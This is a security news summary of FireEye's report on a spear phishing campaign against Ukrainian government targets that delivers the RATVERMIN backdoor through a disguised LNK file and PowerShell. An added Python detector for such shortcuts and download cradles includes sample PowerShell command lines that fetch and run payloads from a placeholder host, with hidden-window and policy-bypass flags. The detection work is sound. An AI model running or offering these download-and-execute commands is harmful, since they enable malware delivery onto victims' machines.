What is the issue - Researchers from FireEye uncovered that the Ukrainian government and military are being targeted by an ongoing spear phishing campaign.
Why it matters - The spear phishing campaign drops a powerful backdoor dubbed ‘RATVERMIN’ as part of a second-stage payload delivered with the help of a PowerShell script.
Worth noting - Researchers suspect that the attackers behind the spear phishing campaign might be associated with the Luhansk People's Republic (LPR) group.
The big picture
Researchers noted that Ukrainian government departments have been targeted by the spear phishing campaign since 2014. However, the latest campaign was observed on January 22, 2019.
- The spear phishing emails sent to the Ukrainian government departments were purported to come from Armtrac, a UK-based defense manufacturer.
- These emails have subject lines similar to ‘SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD’.
- These emails include a zip file named ‘Armtrac-Commercial.7z’ which contains two MS Word documents and a malicious LNK file with a substituted MS Word icon.
- The malicious LNK file carries a command that launches the PowerShell script.
- The PowerShell script downloads a second-stage payload from a C&C server to drop the ‘RATVERMIN’ backdoor onto the targeted machine.
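The delivery chain above (archive containing a shortcut dressed up as a document, shortcut launching PowerShell, PowerShell pulling a second stage) leaves two observable traces a defender can check for: shortcut files sitting in a document archive, and a PowerShell process spawned from Explorer or cmd.exe with a download cradle in its command line. The following is an added example written for this summary, not code from FireEye or from the article; the archive listing and the Sysmon-style process events are constructed samples, and the threshold of two matching reasons is an assumption chosen for illustration.

```python
import re
from dataclasses import dataclass

# Indicators of a PowerShell download cradle in a command line.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Start-BitsTransfer|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
# Flags commonly used to run PowerShell quietly from a shortcut.
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)
# Parents that indicate a user double-clicked something rather than a scheduled or service launch.
SHORTCUT_PARENTS = {"explorer.exe", "cmd.exe"}
DOCUMENT_EXTENSIONS = (".doc", ".docx", ".pdf", ".xls", ".xlsx")


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 fields)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_archive_members(names):
    """Flag shortcut (.lnk) files in an archive listing, noting ones that mimic a document name."""
    hits = []
    for name in names:
        lower = name.lower()
        if lower.endswith(".lnk"):
            stem = lower[: -len(".lnk")]
            disguised = any(stem.endswith(ext) for ext in DOCUMENT_EXTENSIONS)
            hits.append((name, "shortcut disguised as document" if disguised else "shortcut in document archive"))
    return hits


def score_event(ev: ProcessEvent):
    """Return the reasons an event resembles a shortcut-launched PowerShell download cradle."""
    reasons = []
    is_powershell = basename(ev.image) in {"powershell.exe", "pwsh.exe"} or re.search(
        r"\bpowershell(\.exe)?\b", ev.command_line, re.IGNORECASE
    )
    if not is_powershell:
        return reasons
    if basename(ev.parent_image) in SHORTCUT_PARENTS:
        reasons.append("powershell spawned from explorer/cmd (typical of a shortcut launch)")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        reasons.append("download cradle in command line")
    if EVASION_FLAGS.search(ev.command_line):
        reasons.append("hidden window / execution policy bypass flags")
    return reasons


def suspicious_events(events, min_reasons=2):
    """Return (event, reasons) pairs for events meeting the reason threshold (assumed: 2)."""
    flagged = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample archive listing: two decoy documents and a shortcut named like a document.
SAMPLE_ARCHIVE = ["Specification.docx", "Pricing.docx", "Catalogue.docx.lnk"]

# Constructed sample process events; hostnames and paths are placeholders, not report indicators.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r'''cmd.exe /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example/payload')"'''),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe Get-ChildItem C:\Users"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -c Invoke-WebRequest http://stage2.example/update -OutFile C:\Users\Public\u.exe"),
]

if __name__ == "__main__":
    for name, why in suspicious_archive_members(SAMPLE_ARCHIVE):
        print(f"archive: {name}: {why}")
    for ev, reasons in suspicious_events(SAMPLE_EVENTS):
        print(f"process: {basename(ev.parent_image)} -> {basename(ev.image)}: {'; '.join(reasons)}")
```

The two-reason threshold keeps a lone administrator running `powershell.exe` from Explorer out of the alert queue while still catching the shortcut-launched cradle, and the archive check is cheap enough to run on mail-gateway attachments before a user ever sees the Word icon.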
“This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR's security service,” FireEye researchers said.
The bottom line
“While cyber espionage is regularly leveraged as a tool of state power, this capability is not limited to states. Just as new state actors are consistently drawn to this practice, many substate actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory,” John Hultquist, Director of Intelligence Analysis at FireEye told ZDNet.